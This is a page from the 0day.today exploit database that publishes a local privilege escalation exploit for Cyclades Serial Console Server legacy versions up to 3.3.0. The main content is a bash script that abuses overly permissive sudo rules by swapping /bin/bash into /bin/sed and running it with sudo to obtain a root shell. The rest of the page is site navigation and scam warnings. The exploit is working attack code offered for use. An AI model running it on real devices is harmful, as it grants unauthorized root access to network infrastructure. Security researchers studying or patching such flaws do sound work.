0day.today - Biggest Exploit Database in the World.
![](/img/logo_green.jpg)
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earnGOLD
Administration of this site uses the official contacts. Beware of impostors!
![We DO NOT use Telegram or any messengers / social networks!](/img/no_telegram_big.png)
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Cyclades Serial Console Server 3.3.0 - Local Privilege Escalation Vulnerability
# Exploit Title: Cyclades Serial Console Server 3.3.0 - Local Privilege Escalation # Exploit Author: @ibby # Vendor Homepage: https://www.vertiv.com/en-us/ # Software Link: https://downloads2.vertivco.com/SerialACS/ACS/ACS_v3.3.0-16/FL0536-017.zip # Version: Legacy Versions V_1.0.0 to V_3.3.0-16 # Tested on: Cyclades Serial Console Server software (V_1.0.0 to V_3.3.0-16) # CVE : N/A # The reason this exists, is the admin user & user group is the default user for these devices. The software ships with overly permissive sudo privileges ## for any user in the admin group, or the default admin user. This vulnerability exists in all legacy versions of the software - the last version being from ~2014. ### This vulnerability does not exist in the newer distributions of the ACS Software. #!/bin/bash ## NOTE: To view the vulnerability yourself, uncomment the below code & run as sudo, since it's mounting a file system. ## The software is publicly available, this will grab it and unpack the firmware for you. #TMPDIR=$(mktemp -d) #curl 'https://downloads2.vertivco.com/SerialACS/ACS/ACS_v3.3.0-16/FL0536-017.zip' -o FL0536-017.zip && unzip FL0536-017.zip $$ binwalk -e FL0536-017.bin #sudo mount -o ro,loop _FL0536-017.bin.extracted/148000 $TMPDIR && sudo cat "$TMPDIR/etc/sudoers" #echo "As you can see, the sudo permissions on various binaries, like that of /bin/mv, are risky." # ! EXPLOIT CODE BELOW ! # # ------- # Once you exit the root shell, this will clean up and put the binaries back where they belong. echo "Creating backups of sed & bash binaries" sudo cp /bin/sed /bin/sed.bak sudo cp /bin/bash /bin/bash.bak echo "Saved as bash.bak & sed.bak" sudo mv /bin/bash /bin/sed sudo /bin/sed echo "Replacing our binary with the proper one" sudo mv /bin/bash.bak /bin/bash && sudo mv /bin/sed.bak /bin/sed # 0day.today [2024-07-07] #